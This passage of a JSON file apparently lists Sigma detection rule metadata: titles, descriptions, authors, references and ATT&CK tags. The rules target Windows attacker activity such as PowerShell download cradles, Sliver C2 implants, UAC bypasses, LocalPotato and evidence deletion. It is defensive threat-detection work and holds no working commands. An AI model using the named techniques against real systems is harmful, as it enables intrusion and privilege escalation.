"refs": [ "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.command-and-control", "attack.t1104", "attack.t1105" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "84e02621-8fdf-470f-bd58-993bb6a89d91", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", "value": "PowerShell DownloadFile" }, { "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_rurat.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml" ], "tags": [ "attack.defense-evasion", "attack.collection", "attack.command-and-control", "attack.discovery", "attack.s0592" ] }, "uuid": "9ef27c24-4903-4192-881a-3adde7ff92a5", "value": "Renamed Remote Utilities RAT (RURAT) Execution" }, { "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. 
used by EfsPotato)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-11-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_whoami_as_param.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/blackarrowsec/status/1463805700602224645?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml" ], "tags": [ "attack.discovery", "attack.t1033", "car.2016-03-001" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e9142d84-fbe0-401d-ac50-3e519fb00c89", "value": "WhoAmI as Parameter" }, { "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag, which allows all sub-processes of that newly started explorer.exe to run without any UAC checks", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-23", "falsepositive": [ "Domain Controller User Logon", "Unknown how many legitimate software products use that method" ], "filename": "proc_creation_win_explorer_nouaccheck.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/ORCA6665/status/1496478087244095491", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_explorer_nouaccheck.yml" ], "tags": [ "attack.defense-evasion", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "534f2ef7-e8a2-4433-816d-c91bccde289b", "value": "Explorer NOUACCHECK Flag" }, { "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", "meta": { "author": "Nasreddine 
Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "creation_date": "2022-08-25", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "42333b2c-b425-441c-b70e-99404a17170f", "value": "HackTool - Sliver C2 Implant Activity Pattern" }, { "description": "Detects using SettingSyncHost.exe to run hijacked binary", "meta": { "author": "Anton Kutepov, oscd.community", "creation_date": "2020-02-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_settingsynchost.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1574.008" ] }, "related": [ { "dest-uuid": "58af3705-8740-4c68-9329-ec015a7013c2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b2ddd389-f676-4ac4-845a-e00781a48e5f", "value": "Using SettingSyncHost.exe as LOLBin" }, { "description": "Detects suspicious ways to run 
Invoke-Expression using the IEX alias", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-03-24", "falsepositive": [ "Legitimate scripts that use IEX" ], "filename": "proc_creation_win_powershell_iex_patterns.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2", "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_iex_patterns.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "09576804-7a05-458e-a817-eb718ca91f54", "value": "Suspicious PowerShell IEX Execution Patterns" }, { "description": "Office application called wmic to proxy execution through a LOLBIN process. 
This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", "meta": { "author": "Vadim Khrykov, Cyb3rEng", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml" ], "tags": [ "attack.t1204.002", "attack.t1047", "attack.t1218.010", "attack.execution", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e1693bc8-7168-4eab-8718-cdcaa68a1738", "value": "Suspicious WMIC Execution Via Office Process" }, { "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", "meta": { "author": "Florian Roth (Nextron Systems), Tim Shelton", "creation_date": "2018-04-06", "falsepositive": [ "Administrative scripts", "Microsoft SCCM" ], "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1059.005", "attack.t1059.001", "attack.t1218" ] }, "related": [ { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", "value": "Windows Shell/Scripting Processes Spawning Suspicious Programs" }, { "description": "Detects possible execution via LNK file accessed on a WebDAV server.", "meta": { "author": "Micah Babinski", "creation_date": "2023-08-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_webdav_lnk_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html", "https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webdav_lnk_execution.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.t1204" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"1412aa78-a24c-4abd-83df-767dfb2c5bbe", "value": "Potentially Suspicious WebDAV LNK Execution" }, { "description": "Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files.\nAdversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.\n", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2019-10-21", "falsepositive": [ "Msxsl is not installed by default and is deprecated, so unlikely on most systems." ], "filename": "proc_creation_win_msxsl_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msxsl_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1220" ] }, "related": [ { "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e50a8b3-dd05-4eb8-9153-bdb6b79d50b0", "value": "Msxsl.EXE Execution" }, { "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wab_execution_from_non_default_location.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", 
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml" ], "tags": [ "attack.defense-evasion", "attack.execution" ] }, "uuid": "395907ee-96e5-4666-af2e-2ca91688e151", "value": "Wab Execution From Non Default Location" }, { "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-06-25", "falsepositive": [ "Legitimate software creating script event consumers" ], "filename": "proc_creation_win_wmic_eventconsumer_creation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf", "https://twitter.com/johnlatwc/status/1408062131321270282?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml" ], "tags": [ "attack.persistence", "attack.t1546.003" ] }, "related": [ { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ebef4391-1a81-4761-a40a-1db446c0e625", "value": "New ActiveScriptEventConsumer Created Via Wmic.EXE" }, { "description": "Detects potential commandline obfuscation using known escape characters", "meta": { "author": "juju4", "creation_date": "2018-12-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_cli_obfuscation_escape_char.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques", "https://twitter.com/vysecurity/status/885545634958385153", "https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", "https://twitter.com/Hexacorn/status/885570278637678592", "https://twitter.com/Hexacorn/status/885553465417756673", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml" ], "tags": [ "attack.defense-evasion", "attack.t1140" ] }, "related": [ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", "value": "Potential Commandline Obfuscation Using Escape Characters" }, { "description": "Detects execution of the IEExec utility to download and execute files", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-05-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_ieexec_download.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Ieexec/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ieexec_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", "value": "File Download And Execution Via IEExec.EXE" }, { "description": "Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.", "meta": { "author": "@Kostastsale, @TheDFIRReport", 
"creation_date": "2022-12-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_emoji_usage_in_cli_1.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_1.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "4a30ac0c-b9d6-4e01-b71a-5f851bbf4259", "value": "Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1" }, { "description": "A general detection for sdclt spawning new processes. This could be an indicator of sdclt being used in UAC bypass techniques.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sdclt_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/OTRF/detection-hackathon-apt29/issues/6", "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "da2738f2-fadb-4394-afa7-0a0674885afa", "value": "Sdclt Child Processes" }, { "description": "Detects the execution of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract \".cab\" files using the \"/extract\" argument from potentially suspicious paths.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-05", "falsepositive": [ 
"Unknown" ], "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", "https://www.echotrail.io/insights/search/wusa.exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" ], "tags": [ "attack.execution" ] }, "uuid": "c74c0390-3e20-41fd-a69a-128f0275a5ea", "value": "Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths" }, { "description": "Detects execution of \"rundll32.exe\" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.", "meta": { "author": "CD_ROM_", "creation_date": "2022-05-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_parent_explorer.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://redcanary.com/blog/raspberry-robin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "1723e720-616d-4ddc-ab02-f7e3685a4713", "value": "Rundll32 Spawned Via Explorer.EXE" }, { "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", "meta": { "author": "frack113", "creation_date": "2021-11-15", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_reg_bitlocker.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_bitlocker.yml" ], "tags": [ "attack.impact", "attack.t1486" ] }, "related": [ { "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0e0255bf-2548-47b8-9582-c0955c9283f5", "value": "Suspicious Reg Add BitLocker" }, { "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", "meta": { "author": "frack113", "creation_date": "2021-11-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_zipexec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/Tylous/ZipExec", "https://twitter.com/SBousseaden/status/1451237393017839616", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_zipexec.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1218", "attack.t1202" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", "value": "Suspicious ZipExec Execution" }, { "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", "meta": { "author": "Bartlomiej Czyz, Relativity", "creation_date": "2021-01-31", "falsepositive": [ "False positives may occur if a user called rundll32 from CLI with no options" ], "filename": "proc_creation_win_rundll32_without_parameters.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", 
"refs": [ "https://bczyz1.github.io/2021/01/30/psexec.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002", "attack.t1570", "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bf90d72c-c00b-45e3-b3aa-68560560d4c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5bb68627-3198-40ca-b458-49f973db8752", "value": "Rundll32 Execution Without Parameters" }, { "description": "Detects when a user enables developer features such as \"Developer Mode\" or \"Application Sideloading\". 
Which allows the user to install untrusted packages.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "a383dec4-deec-4e6e-913b-ed9249670848", "value": "Potential Signing Bypass Via Windows Developer Features" }, { "description": "Detects suspicious child processes of the \"Manage Engine ServiceDesk Plus\" Java web service", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2023-01-18", "falsepositive": [ "Legitimate sub processes started by Manage Engine ServiceDesk Pro" ], "filename": "proc_creation_win_java_manageengine_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py", "https://blog.viettelcybersecurity.com/saml-show-stopper/", "https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml" ], "tags": [ "attack.command-and-control", "attack.t1102" ] }, "related": [ { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cea2b7ea-792b-405f-95a1-b903ea06458f", "value": "Suspicious Child Process Of Manage Engine ServiceDesk" }, { 
"description": "Detects addition of users to highly privileged groups via \"Net\" or \"Add-LocalGroupMember\".", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-02-23", "falsepositive": [ "Administrative activity that must be investigated" ], "filename": "proc_creation_win_susp_add_user_privileged_group.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_privileged_group.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "10fb649c-3600-4d37-b1e6-56ea90bb7e09", "value": "User Added To Highly Privileged Group" }, { "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-14", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_localpotato.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/decoder-it/LocalPotato", "https://www.localpotato.com/localpotato_html/LocalPotato.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_localpotato.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "cve.2023-21746" ] }, "uuid": "6bd75993-9888-4f91-9404-e1e4e4e34b77", "value": "HackTool - LocalPotato Execution" }, { "description": "Detects execution of the \"del\" builtin command to remove files using greedy/wildcard expression. 
This is often used by malware to delete the content of folders that may contain the initial malware infection, or to delete evidence.", "meta": { "author": "frack113 , X__Junior (Nextron Systems)", "creation_date": "2021-12-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_del_greedy_deletion.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "204b17ae-4007-471b-917b-b917b315c5db", "value": "Greedy File Deletion Using Del" }, { "description": "Detects the execution of a specific OneLiner to download and execute powershell modules in memory.", "meta": { "author": "@Kostastsale, @TheDFIRReport", "creation_date": "2022-05-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_download_cradle_obfuscated.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://gist.github.com/mgeeky/3b11169ab77a7de354f4111aa2f0df38", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_cradle_obfuscated.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059.001", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
"type": "related-to" }, { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "44e24481-6202-4c62-9127-5a0ae8e3fe3d", "value": "Obfuscated PowerShell OneLiner Execution" }, { "description": "Detects PowerShell command line patterns in combination with encoded commands that often appear in malware infection chains", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-05-24", "falsepositive": [ "Other tools that work with encoded scripts in the command line instead of script files" ], "filename": "proc_creation_win_powershell_base64_encoded_cmd_patterns.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_cmd_patterns.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", "value": "Suspicious PowerShell Encoded Command Patterns" }, { "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", 
